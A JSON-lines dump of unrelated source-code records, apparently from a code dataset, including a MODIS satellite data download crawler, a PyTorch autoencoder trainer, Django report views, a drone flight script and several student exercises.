http://222.236.46.45/nfsdb/MODIST/2011/09/03/L2/MODOCT.2011.0903.0222.terra-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODISA/2012/01/02/L2/MYDOCT.2012.01.02.0510.aqua-1.hdf.zip\n#full_url = 'http://222.236.46.45/nfsdb/MODISA/2019/01/01/L2/MYDOCT.2019.0101.0000.aqua-1.hdf.zip'\n\nsave_dir_name = '../../downloads/'\nif not os.path.exists(save_dir_name):\n os.makedirs(save_dir_name)\n\n\n\nurl1 = 'http://222.236.46.45/nfsdb/MODIST'\nurl2 = 'terra-1.hdf.zip'\n\nfull_urls = []\n\nfor Yr in range(2012, 2020) :\n for Mo in range(1, 2) :\n for Da in range(1, 32) :\n for Ho in range(0, 24) :\n for Mi in range(0, 60) :\n full_urls.append(\"{0}/{1:04d}/{2:02d}/{3:02d}/L2/MODOCT.{1:04d}.{2:02d}{3:02d}.{4:02d}{5:02d}.{6}\"\\\n .format(url1, Yr, Mo, Da, Ho, Mi, url2))\n \nfor full_url in full_urls : \n filename_el = full_url.split(\"/\")\n filename = filename_el[-1]\n\n if not os.path.exists(filename) :\n try :\n urllib.urlretrieve(full_url, '{0}{1}'.format(save_dir_name, filename))\n print ('Trying {0}'.format(full_url), '{0}{1}\\n'.format(save_dir_name, filename))\n except Exception as e: \n print('error {0} : {1}\\n'.format(e, filename))\n else :\n print ('{0} already exists\\n'.format(filename))\n ","sub_path":"Python_code/kosc_url_crawler_sj_terra.py","file_name":"kosc_url_crawler_sj_terra.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"295929554","text":"from animal import Animal\n\nclass Person(Animal):\n def __init__(self,name,age):\n Animal.__init__(self,age)\n self.set_name(name)\n self.friends=[]\n def get_friends(self):\n return self.friends\n def add_friend(self,fname):\n if fname not in self.friends:\n self.friends.append(fname)\n def speak(self):\n print(\"hello.\")\n def age_diff(self,other):\n diff=self.years-other.years\n print(abs(diff),\"years difference\")\n def __str__(self):\n return \"person:\"+str(self.name)+\":\"+str(self.years)\n\nif __name__==\"__main__\":\n p=Person(\"light\",38)\n print(p)\n p.add_friend('neo')\n p.add_friend('nick')\n print(p.get_friends())\n p.speak()\n q=Person(\"Kasey\",22)\n p.age_diff(q)\n q.age_diff(p)\n print(p.get_age())\n print(p.get_name())\n\n","sub_path":"ses9/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533396364","text":"#!/usr/bin/python3.6\n# -*- coding: utf-8 -*-\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#PORCENTAGEM\n# Volume atual de um reservatório de água (em metros cúbicos)\nreservoir_volume = 4.445e8\nreservoir_volume2 = 4.445 * 10 ** 8\n\n# Total de água da chuva de uma tempestade(em metros cúbicos)\nrainfall = 5e6\nrainfall2 = 5 * 10 ** 6\nrainfall *= .9\n\n# Reduza a variável de água da chuva(rainfall) em 10% para considerar perdas\nperda = (rainfall2 - (rainfall2 * 10 /100))\nreservoir_volume += rainfall\n\n# Adicione a variável rainfall à variaável de vol. atual do reservatório(reservoir_volume)\ntotal_reservoir = perda + reservoir_volume2\nreservoir_volume *= 1.05\n\n# aumente o volume do reservatório (reservoir_volume) em 5% para considerar águas tempestuosas\n# que chegam no reservatório dias apoós a tempestade\naumento = (total_reservoir + (total_reservoir * 5 / 100))\nreservoir_volume *= 0.95\n\n# reduza o volume do reservatório (reservoir_volume) em 5% para considerar evaporaçaão \nreducao = (aumento - (aumento * 5 / 100))\nprint(reducao)\nreservoir_volume *= 0.95\n\n# Subtraia 2.5e5 metros cúbicos de reservoir_volume para considerar água\n# que édirecionada para regiões áridas.\nnewvolume = 2.5 * 10 ** 5\nprint(newvolume)\ntotal = reducao - newvolume\nreservoir_volume -= 2.5e5 \n\n# execute um print do novo valor de reservoir_volume\nprint(total)\nprint(reservoir_volume)\n\nteste = 5e6 \nteste = teste * .9\nprint(teste) \n\nrainfall = 5e6\nteste2 = (rainfall -(rainfall * 10 / 100))\nprint(teste2)","sub_path":"aula03_exercicio.py","file_name":"aula03_exercicio.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"65704027","text":"import os\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torchvision import transforms\r\nfrom torchvision.utils import save_image\r\nfrom scipy.stats.stats import pearsonr\r\nfrom Progbar import Progbar\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom model import LinearAutoEncoder # 模型\r\nfrom util import LinearPackDataset, norm, minmax_0_to_1 # 数据\r\nfrom util import OutputManager, save_output_data # 保存文件\r\nfrom util import calculate_pcc_mse, minmax_noisy_data # 计算\r\nfrom util import predict_one_by_one\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\r\nnum_epochs = 10\r\nbatch_size = 50\r\nlearning_rate = 1e-3\r\noutput_path = \"./output\"\r\nmodel_name = \"LinearAutoEncoder\"\r\n\r\n\r\ndef predict(output_manager, device, num_epochs=10):\r\n dataset = LinearPackDataset(output_manager.simulated_csv_data_path, output_manager.true_csv_data_path)\r\n dataloader = DataLoader(dataset, batch_size=50, shuffle=True, num_workers=3)\r\n model = LinearAutoEncoder().to(device)\r\n MSE_loss = nn.MSELoss()\r\n BCE_Loss = nn.BCELoss()\r\n criterion = MSE_loss\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3, weight_decay=1e-5)\r\n\r\n # 训练\r\n if os.path.exists(output_manager.model_file_path()):\r\n model.load_state_dict(torch.load(output_manager.model_file_path(), \"cpu\"))\r\n else:\r\n model.train()\r\n for epoch in range(num_epochs):\r\n print('epoch [{}/{}]'.format(epoch + 1, num_epochs))\r\n prog = Progbar(len(dataloader))\r\n for i, data in enumerate(dataloader):\r\n (noisy_data, _) = data\r\n noisy_data = minmax_noisy_data(noisy_data, device)\r\n # ===================forward=====================\r\n output = model(noisy_data)\r\n loss = criterion(output, noisy_data)\r\n pcc, mse = calculate_pcc_mse(output, noisy_data, MSE_loss)\r\n # ===================backward====================\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n # =====================log=======================\r\n prog.update(i + 1, [(\"loss\", loss.item()), (\"MSE\", mse), (\"PCC\", pcc)])\r\n torch.save(model.state_dict(), output_manager.model_file_path())\r\n\r\n # 预测、评价\r\n model.eval()\r\n dataloader2 = DataLoader(dataset, batch_size=2000, shuffle=True, num_workers=3)\r\n for data in dataloader2:\r\n (noisy_data, _) = data\r\n noisy_data = minmax_noisy_data(noisy_data, device)\r\n # ===================forward=====================\r\n output = model(noisy_data)\r\n loss = criterion(output, noisy_data)\r\n # =====================log and save==============\r\n save_output_data(output, noisy_data, MSE_loss, output_manager)\r\n break # 只有一个 batch, 一次全拿出来了,不会有第二个\r\n\r\n\r\ndef predict_with_output_manager(simulated_csv_data_path, true_csv_data_path, model_filename, dropout):\r\n output_manager = OutputManager(simulated_csv_data_path=simulated_csv_data_path,\r\n true_csv_data_path=true_csv_data_path,\r\n model_filename=model_filename,\r\n output_path=output_path,\r\n model_name=model_name,\r\n dropout=dropout)\r\n predict(output_manager=output_manager,\r\n device=device,\r\n num_epochs=num_epochs)\r\n\r\n\r\npredict_one_by_one(predict_with_output_manager)\r\n","sub_path":"train_AE.py","file_name":"train_AE.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450301154","text":"import numpy as np\n\nimport numba as nb\n\n@nb.njit()\ndef partition(values, idxs, left, right):\n \"\"\"\n Partition method\n \"\"\"\n\n piv = values[idxs[left]]\n i = left + 1\n j = right\n\n while True:\n while i <= j and values[idxs[i]] <= piv:\n i += 1\n while j >= i and values[idxs[j]] >= piv:\n j -= 1\n if j <= i:\n break\n\n idxs[i], idxs[j] = idxs[j], idxs[i]\n\n idxs[left], idxs[j] = idxs[j], idxs[left]\n\n return j\n\n\n@nb.njit()\ndef argsort1D(values):\n\n idxs = np.arange(values.shape[0])\n\n left = 0\n right = values.shape[0] - 1\n\n max_depth = np.int(right / 2)\n\n ndx = 0\n\n tmp = np.zeros((max_depth, 2), dtype=np.int64)\n\n tmp[ndx, 0] = left\n tmp[ndx, 1] = right\n\n ndx = 1\n while ndx > 0:\n\n ndx -= 1\n right = tmp[ndx, 1]\n left = tmp[ndx, 0]\n\n piv = partition(values, idxs, left, right)\n\n if piv - 1 > left:\n tmp[ndx, 0] = left\n tmp[ndx, 1] = piv - 1\n ndx += 1\n\n if piv + 1 < right:\n tmp[ndx, 0] = piv + 1\n tmp[ndx, 1] = right\n ndx += 1\n\n return idxs\n\n\nif __name__ == '__main__':\n x = np.random.random((100000,))\n\n res = np.argsort(x)\n out = argsort1D(x)\n\n assert np.all(res == out)\n print('all ok')\n","sub_path":"scipy_numba/cluster/_argsort.py","file_name":"_argsort.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194571433","text":"'''\n airsim 四旋翼飞圆形\n'''\nimport airsim\nimport numpy as np\nimport math\nimport time\n\nclient = airsim.MultirotorClient() # connect to the AirSim simulator\nclient.enableApiControl(True) # 获取控制权\nclient.armDisarm(True) # 解锁\nclient.takeoffAsync().join() # 起飞\nclient.moveToZAsync(-3, 1).join() # 第二阶段:上升到2米高度\n\ncenter = np.array([[0], [3]]) # 圆心设置\nspeed = 1 # 速度设置\nradius = 3 # 半径设置\nclock_wise = True # 顺时针或逆时针设置\n\npos_reserve = np.array([[0.], [0.], [-3.]])\n\n\n # 速度控制\nfor i in range(2000):\n # 获取无人机当前位置\n state = client.simGetGroundTruthKinematics()\n pos = np.array([[state.position.x_val], [state.position.y_val], [state.position.z_val]])\n # 计算径向速度的方向向量\n dp = pos[0:2] - center\n #np.linalg.norm求的是二范数,正数\n if np.linalg.norm(dp) - radius > 0.1:\n vel_dir_1 = -dp\n elif np.linalg.norm(dp) - radius < 0.1:\n vel_dir_1 = dp\n # 计算切向速度的方向向量\n theta = math.atan2(dp[1, 0], dp[0, 0])\n if clock_wise:\n theta += math.pi / 2\n else:\n theta -= math.pi / 2\n v_dir_2 = np.array([[math.cos(theta)], [math.sin(theta)]])\n # 计算最终速度的方向向量\n v_dir = 0.12 * vel_dir_1 + v_dir_2\n # 计算最终速度指令\n v_cmd = speed * v_dir/np.linalg.norm(v_dir)\n # 速度控制\n drivetrain = airsim.DrivetrainType.ForwardOnly\n yaw_mode = airsim.YawMode(False, 90)\n client.moveByVelocityZAsync(v_cmd[0, 0], v_cmd[1, 0], -3, 1, drivetrain=drivetrain, yaw_mode=yaw_mode)\n # 画图\n point_reserve = [airsim.Vector3r(pos_reserve[0, 0], pos_reserve[1, 0], pos_reserve[2, 0])]\n point = [airsim.Vector3r(pos[0, 0], pos[1, 0], pos[2, 0])]\n point_end = pos + np.vstack((v_cmd, np.array([[0]])))\n point_end = [airsim.Vector3r(point_end[0, 0], point_end[1, 0], point_end[2, 0])]\n client.simPlotArrows(point, point_end, arrow_size=8.0, color_rgba=[0.0, 0.0, 1.0, 1.0])\n client.simPlotLineList(point_reserve+point, color_rgba=[1.0, 0.0, 0.0, 1.0], is_persistent=True)\n # 循环\n pos_reserve = pos\n time.sleep(0.02)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35344474","text":"def is_safe(grid, visited, x, y):\n if grid[x][y]==\"*\" or visited[x][y]:\n return False\n return True\n\ndef is_valid(grid, x, y):\n m,n = len(grid), len(grid[0])\n return x=0 and y>=0\n\ndef find_shorted_path(grid, visited, cx, cy, dx, dy, dist,min_dist):\n if cx == dx and cy == dy:\n min_dist = min(min_dist, dist)\n print('here')\n visited[cx][cy] = 1\n if is_valid(grid, cx+1,cy) and is_safe(grid, visited, cx+1, cy):\n find_shorted_path(grid, visited, cx+1, cy, dx, dy,dist,min_dist)\n if is_valid(grid, cx-1,cy) and is_safe(grid, visited, cx-1, cy):\n find_shorted_path(grid, visited, cx-1, cy, dx, dy,dist,min_dist)\n if is_valid(grid, cx,cy+1) and is_safe(grid, visited, cx, cy+1):\n find_shorted_path(grid, visited, cx, cy+1, dx, dy,dist,min_dist)\n if is_valid(grid, cx,cy-1) and is_safe(grid, visited, cx, cy-1):\n find_shorted_path(grid, visited, cx, cy-1, dx, dy,dist,min_dist)\n visited[cx][cy] = 0\n\n\n\n\n\n\n\nn, m, q = [int(x) for x in input().split()]\ngrid = []\nfor i in range(n):\n grid.append([x for x in input().split()])\nsx, sy = [int(x) for x in input().split()]\nvisited = [[0 for x in range(n)] for y in range(m)]\nfor _ in range(q):\n dx, dy = [int(x) for x in input().split()]\n min_dist = int(10e9)\n find_shorted_path(grid, visited, sx, sy, dx, dy, 0, min_dist)\n print(min_dist)\n\n\n\n\n\n\n\n\n","sub_path":"HackerEarth/min_distance.py","file_name":"min_distance.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610838342","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 1 12:00:40 2017\n\n@author: rimikamajumdar\n\"\"\"\n\n# Exercise 29: What If\n# Introduction to if-statement\n# try putting boolean expressions in the if-statements\n\npeople = 20\ncats = 30\ndogs = 15\n\n\nif (people < cats and 1 == 1):\n print(\"Too many cats! The world is doomed!\")\n\nif (people > cats or False):\n print(\"Not many cats! The world is saved!\")\n \nif (people < dogs and 3 != 2):\n print(\"The world is drooled on!\")\n \nif (people > dogs and (100 == 100 or \"Rimika\" == \"kool\")):\n print(\"The world is dry!\")\n \n# increment dogs by 5 \ndogs += 5\n\nif (people >= dogs or (\"Python\" == 100)):\n print(\"People are greater than or equal to dogs.\")\n \nif (people <= dogs and (not (1 != 1 and 10 == 10))):\n print(\"People are less than or equal to dogs.\")\n \nif (people == dogs and (1 == 1 or \"5\" == str(5))):\n print(\"People are dogs.\")\n \n'''\nOutput is the following:\nToo many cats! The world is doomed!\nThe world is dry!\nPeople are greater than or equal to dogs.\nPeople are less than or equal to dogs.\nPeople are dogs.\n'''","sub_path":"ex29.py","file_name":"ex29.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208918071","text":"############################\n## Calvin Yong ##\n## MTH 691 Program 5 ##\n############################\n\nimport pandas as pd\nimport plotly.offline as py\nimport plotly.graph_objs as go\nimport multiprocessing as mp\nfrom itertools import repeat\nimport pathlib\nfrom time import time\nimport projfuncs as pf\nimport projLists\nimport os\n\ndef program5a(fileloc, filetype, quotetype):\n init_tm = time()\n\n # Make dir\n fsplit = fileloc.split('_')\n date = fsplit[len(fsplit) - 1][:-4]\n dirpath = \"program5a_out/\" + filetype + \"/\" + date + \"/\" + quotetype +\"/\"\n pathlib.Path(dirpath).mkdir(parents=True, exist_ok=True)\n\n # Get List of tickers\n pf.get_tickerList(date, filetype)\n\n for ticker in projLists.ticker_list:\n data_starttm = time()\n data = pf.get_tickerData(fileloc, filetype, ticker, \"Q\")\n print(\"Got\", ticker, \"data DF in\", time() - data_starttm, \"Seconds\")\n\n #################\n # Plotting time #\n #################\n\n if(data.empty):\n message = \"There is no \" + quotetype + \" data for \" + ticker + \" at \" + date + \"\\n\"\n print(message)\n with open(\"program5a_\" + filetype + \"_log.txt\", 'a+') as f:\n f.write(message)\n continue\n\n title_date = data.Time[len(data) - 1].strftime('%b %-d, %Y')\n layout = go.Layout(xaxis={'title': 'Time (UTC)', 'type': 'date',\n 'tickformat': '%I:%M:%S %p'},\n yaxis={'title': 'Price'},\n title=ticker + \" | \" + quotetype + \" | \" + title_date,\n showlegend=True)\n \n # Make a trace for each venue\n traces = []\n for venue in data[\"Contributor Id\"].unique():\n trace = go.Scatter(x = data.Time[data[\"Contributor Id\"] == venue], \n y = data[quotetype + \" Price\"][data[\"Contributor Id\"] == venue],\n name = venue)\n traces.append(trace)\n \n # Output html file\n fig = go.Figure(data = traces, layout = layout)\n imgname = ticker + \"_\" + \"quotes_\" + quotetype + \"_\" + filetype \\\n + \"_\" + date\n py.plot(fig, \n filename=dirpath + imgname + \".html\", \n image=\"png\",\n image_filename=imgname,\n image_width=1024,\n image_height=768,\n auto_open=False, \n show_link=False)\n\n print(\"Ticker\", ticker, \"at date\", date, \"done\")\n\n print(date, \"plots finished in\", time() - init_tm, \"seconds\")\n\n\n###################\n## Main Function ##\n###################\n\nif __name__ == \"__main__\":\n filetype = pf.get_validInput(\"Type A or B files: \", 4)\n while True:\n quotetype = input(\"Enter Bid or Ask: \")\n if (quotetype in [\"Bid\", \"Ask\"]):\n break\n print(\"Invalid Input\")\n\n os.chdir(\"/space/mth693/common/phase1_alloutput/\")\n\n program_start_tm = time()\n with mp.Pool(mp.cpu_count()) as pool:\n pool.starmap(program5a, \n zip(projLists.file_list, repeat(filetype), repeat(quotetype)))\n \n print(\"Program finished in\", (time() - program_start_tm)/60, \"minutes\")\n print(\"Type\", filetype, \"quotetype\", quotetype, \"files done :D\")\n ","sub_path":"Aux_scripts/program5a_getAll.py","file_name":"program5a_getAll.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552892017","text":"import KratosMultiphysics\nimport KratosMultiphysics.ALEApplication as KratosALE\n\ndef Factory(settings, Model):\n if(type(settings) != KratosMultiphysics.Parameters):\n raise Exception(\"expected input shall be a Parameters object, encapsulating a json string\")\n return SetInterfaceProcess(Model, settings[\"Parameters\"])\n\nclass SetInterfaceProcess(KratosMultiphysics.Process):\n def __init__(self, Model, settings):\n\n KratosMultiphysics.Process.__init__(self)\n\n default_parameters = KratosMultiphysics.Parameters( \"\"\"\n {\n \"mesh_id\" : 0,\n \"model_part_name\" : \"CHOOSE_FLUID_OR_STRUCTURE_INTERFACE_MODELPART_NAME\",\n \"variable_name\" : \"CHOOSE_BETWEEN_STRUCTURE_INTERFACE_OR_FLUID_INTERFACE\"\n } \"\"\" )\n\n settings.ValidateAndAssignDefaults(default_parameters);\n\n interface_model_part = Model[settings[\"model_part_name\"].GetString()]\n\n if settings[\"variable_name\"].GetString() == \"STRUCTURE_INTERFACE\":\n for node in interface_model_part.Nodes:\n # Set the INTERFACE flag\n node.Set(KratosMultiphysics.INTERFACE, True)\n\n elif settings[\"variable_name\"].GetString() == \"FLUID_INTERFACE\":\n zero_vect = [0,0,0]\n\n for node in interface_model_part.Nodes:\n # Set the INTERFACE flag\n node.Set(KratosMultiphysics.INTERFACE, True)\n # Fix the MESH_DISPLACEMENT and initialize it to zero at the interface\n node.Fix(KratosALE.MESH_DISPLACEMENT_X)\n node.Fix(KratosALE.MESH_DISPLACEMENT_Y)\n node.Fix(KratosALE.MESH_DISPLACEMENT_Z)\n node.SetSolutionStepValue(KratosALE.MESH_DISPLACEMENT,0,zero_vect)\n","sub_path":"kratos/applications/FSIapplication/python_scripts/set_interface_process.py","file_name":"set_interface_process.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"579750594","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 5 15:43:13 2019\n\n@author: George\n\"\"\"\n\nimport pandas as pd\n\n\nfilePath =r\"Y:\\8_NAM (Nucleic-Acid Memory)_Sep2017_InProgress\\11_Super-Resolution\\George_D_DATA\\2020-02-11\\2020-01-31_dNAM_LS_mhPS37_repreat-locs.csv\"\nsavePath = filePath.split('.')[0] + '_fixed.csv'\n\ndf = pd.read_csv(filePath)\n\ncolNames = list(df.columns) \nprint(colNames)\n\ndf.rename(index=str, columns={\"uncertainty [nm]\": \"uncertainty_xy [nm]\"}, inplace=True)\n\ncolNames2 = list(df.columns) \n\n\ndf.to_csv(savePath, index=False)\n\nprint('Done')","sub_path":"BSU/fix_thunderstormCSV_header 2.py","file_name":"fix_thunderstormCSV_header 2.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"482436417","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ezidapp', '0010_storeuser_inheritgroupshoulders'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='downloadqueue',\n name='currentIndex',\n field=models.IntegerField(default=0),\n ),\n migrations.AddField(\n model_name='downloadqueue',\n name='toHarvest',\n field=models.TextField(default=''),\n preserve_default=False,\n ),\n ]\n","sub_path":"ezidapp/migrations/0011_downloadqueue_part1.py","file_name":"0011_downloadqueue_part1.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282041673","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom useract.functions import validate_inputs\nfrom useract.models import Authority, Inquiry\n\n\nclass getReport(View):\n template = 'reportofauth/reportofauth.html'\n template1='reportsearch/report.html'\n def post(self,request):\n date = request.POST.get('date')\n validity = validate_inputs.validDate(date)\n new_date =''\n if(validity[0]):\n for letter in date:\n if (letter != \"/\"):\n new_date = new_date + letter\n #just put a number change later\n authr = request.session['auth']\n report_id = str(authr) + str(new_date)\n authorityName = Authority.objects.filter(authority_id=int(authr))\n authNameStr = ''\n da = generateReportData(date,int(authr))\n array = da[0]\n for auth in authorityName:\n authNameStr = auth.authority_name\n obj = Inquiry.objects.filter(report_id=report_id)\n array1 = da[2]\n array2 = generateReportData2(date,int(authr))\n return render(request, self.template,{'r':report_id,'obj':obj,'var1':array[0],'var2':array[1],\n 'var3':array[2],'var4':array[3],'var5':array[4],\n 'var6':array[5],'var7':array[6],'var8':array[7],'var9':array[8],\n 'var10':array[9],'var11':array[10],'var12':array[11],\n 'm1': array1[0], 'm2': array1[1],\n 'm3': array1[2], 'm4': array1[3], 'm5': array1[4],\n 'm6': array1[5], 'm7': array1[6], 'm8': array1[7],\n 'm9': array1[8],\n 'm10': array1[9], 'm11': array1[10], 'm12': array1[11],\n 'array':array2[0],'cnt':array2[1],'d1':array2[1][0],'d2':array2[1][1],\n 'd3': array2[1][2],'d4':array2[1][3],'d5':array2[1][4],\n 'd6': array2[1][5],'d7':array2[1][6],\n })\n\n else:\n return render(request, self.template1, {'user': request.session['users'],'msg':\"INVALID\"})\n\n def get(self,request):\n return render(request, self.template1,{'user':request.session['users'],'msg':\"\"})\n\n\nclass getSearchHome(View):\n template = \"reportsearch/report.html\"\n\n def post(self, request):\n return render(request, self.template, )\n\n def get(self, request):\n return render(request, self.template, {'user': request.session['users']})\n\n\ndef generateReportData(date,auth):\n dic= {'1':'Jan','2':'Feb','3':'Mar','4':'Apr','5':'May','6':'Jun','7':'Jul',\n '8':'Aug','9':'Sep','10':'Oct','11':'Nov','12':'Dec'}\n template = \"test/test.html\"\n nameofmonths = []\n num_of_inquiry = []\n authority = auth\n months = []\n day = date[0:2]\n month = int(date[3:5])\n year = int(date[6:])\n for i in range(0,12):\n if(month != 0):\n id=''\n if(len(str(month))==1):\n id = \"0\"+str(month)\n else:\n id = str(month)\n months.append(id+str(year))\n nameofmonths.append(dic[str(month)])\n month = month-1\n\n else:\n month = 12\n id = ''\n if (len(str(month)) == 1):\n id = \"0\" + str(month)\n else:\n id = str(month)\n months.append(id+str(year-1))\n nameofmonths.append(dic[str(month)])\n month = month-1\n year = year-1\n\n\n\n all_inq = Inquiry.objects.all()\n for j in months:\n count= 0\n for inq in all_inq:\n if(str(inq.report_id.report_id)[3:] == j and str(inq.report_id.report_id)[0]==str(authority)):\n count+=1\n\n num_of_inquiry.append(count)\n\n return num_of_inquiry,months,nameofmonths\n\ndef generateReportData2(date,auth):\n dic = {'1': 'Jan', '2': 'Feb', '3': 'Mar', '4': 'Apr', '5': 'May', '6': 'Jun', '7': 'Jul',\n '8': 'Aug', '9': 'Sep', '10': 'Oct', '11': 'Nov', '12': 'Dec'}\n\n dic2 = {'1':31,'2':28,'3':31,'4':30,'5':31,'6':31,'7':31,'8':30,'9':31,'10':31,'11':30,'12':31}\n day = int(date[0:2])\n month = int(date[3:5])\n year = int(date[6:])\n rep_id =[]\n for i in range(0,7):\n id =''\n if(int(day) !=0):\n if(len(str(day)) == 1):\n id = \"0\"+str(day)\n else:\n id = str(day)\n\n if(len(str(month))==1):\n id = id+\"0\"+str(month)\n else:\n id = id+str(month)\n id = str(auth)+id+str(year)\n day =day-1\n rep_id.append(id)\n\n if(day == 0):\n if(month!=1):\n month = month-1\n day = dic2[str(month)]\n\n if (len(str(day)) == 1):\n id = \"0\" + str(day)\n else:\n id = str(day)\n\n if (len(str(month)) == 1):\n\n id = id + \"0\" + str(month)\n else:\n id = id + str(month)\n id = str(auth) + id + str(year)\n rep_id.append(id)\n day = day - 1\n\n elif(month == 1):\n month =12\n day =31\n year =year-1\n if (len(str(day)) == 1):\n id = \"0\" + str(day)\n else:\n id = str(day)\n\n if (len(str(month)) == 1):\n id = id + \"0\" + str(month)\n else:\n id = id + str(month)\n id = str(auth) + id + str(year)\n rep_id.append(id)\n day = day - 1\n all_inq = Inquiry.objects.all()\n num_of_inq2 = []\n for j in rep_id:\n count = 0\n for inq in all_inq:\n if (str(inq.report_id.report_id) == (j)):\n count += 1\n\n num_of_inq2.append(count)\n\n\n return rep_id,num_of_inq2\n\n\n\n","sub_path":"useract/all_views/externalUserView.py","file_name":"externalUserView.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94177024","text":"import uuid\nfrom matplotlib import pyplot as plt\n\nclass FloorElement:\n\n\tdef __init__(self, name=\"noName\", dimensions=(0,0), color=\"noColor\", elementID=\"noID\", elementType=\"noType\", clickCoordinates=(0,0), elementCoordinates=(0,0)):\n\t\tself.name = name\n\t\tself.dimensions = dimensions\n\t\tself.color = color\n\t\tself.elementID = elementID\n\t\tself.elementType = elementType\n\t\tself.clickCoordinates = clickCoordinates\n\t\tself.elementCoordinates = elementCoordinates\n\n\tdef drawElement(self):\n\t\tself.dimensions = list(map(int, input(\"sisesta elemendi mõõtmed (xx:yy): \").split(\":\")))\n\t\tprint(\"--- alustan joonistamist ---\")\n\t\tprint(f\"nimi: {self.name}\")\n\t\tprint(f\"mõõtmed: {self.dimensions}\")\n\t\tprint(f\"värv: {self.color}\")\n\t\tprint(f\"tüüp: {self.elementType}\")\n\n\tdef generateID(self):\n\t\tself.elementID = uuid.uuid4()\n\t\tprint(\"ID:\", self.elementID)\n\t\tprint(\"--- joonistamine lõpetatud ---\")\n\n\tdef coordinateCheck(self):\n\t\tself.elementCoordinates = list(map(int, input(\"sisesta elemendi koordinaadid (xx:yy): \").split(\":\")))\n\t\tself.clickCoordinates = list(map(int, input(\"sisesta kliki koordinaadid (xx:yy): \").split(\":\")))\n\n\t\tif((((self.clickCoordinates[0] < self.elementCoordinates[0]) and (self.dimensions[0] + self.elementCoordinates[0] > self.clickCoordinates[0])) and \n\t\t ((self.clickCoordinates[1] < self.elementCoordinates[1]) and (self.dimensions[1] + self.elementCoordinates[1] > self.clickCoordinates[1]))) \n\t\t\tor\n\t\t (((self.clickCoordinates[0] > self.elementCoordinates[0]) and (self.dimensions[0] + self.elementCoordinates[0] < self.clickCoordinates[0])) and \n\t\t ((self.clickCoordinates[1] > self.elementCoordinates[1]) and (self.dimensions[1] + self.elementCoordinates[1] < self.clickCoordinates[1])))):\n\t\t\tprint(\"klikk ei asu objektil\")\n\t\telse:\n\t\t\tprint(\"klikk asub elemendil ->\", self.name)\n\n\tdef export(self):\n\t\tx = [self.clickCoordinates[0], self.clickCoordinates[0], self.elementCoordinates[0], self.elementCoordinates[0]]\n\t\ty = [self.clickCoordinates[1], self.clickCoordinates[1], self.dimensions[1], self.dimensions[1]]\n\t\tplt.xlabel('x')\n\t\tplt.ylabel('y')\n\t\tplt.title('xx:yy koordinaatide graaf')\n\t\tplt.plot(x, y)\n\t\tplt.show()\n\t\t#mõõtmeid ei arvestata õigesti\n\nelements = [\n\tFloorElement(name=\"väike p6randa tykk\", color=\"sinine\", elementType=\"img\"),\n\tFloorElement(name=\"keskmine p6randa tykk\", color=\"punane\", elementType=\"txt\"),\n\tFloorElement(name=\"suur p6randa tykk\", color=\"l2bipaistev\", elementType=\"sym\")\n]\n\nfor element in elements:\n\telement.drawElement()\n\telement.generateID()\n\telement.coordinateCheck()\n\telement.export()\n","sub_path":"tarkvaraarendus/04 - graafiline redaktor.py","file_name":"04 - graafiline redaktor.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253197118","text":"hwtime = 0\n\n#5\n#sum all numbers from 1 to n\nhwtime += 6\ndef nSum(n):\n if n == 1:\n return n\n else:\n return n + nSum(n-1)\n\n#6\n#return whether a string is a palindrome\nhwtime += 4\ndef isPalindrome(string):\n # s = reversed(string)\n return string == string[::-1]\n\nisPalindrome('abcba')\n\n\n#7\n#recursive method to compute x ** y\nhwtime += 14\ndef myPow(x, y):\n if y == 1:\n return x\n if y 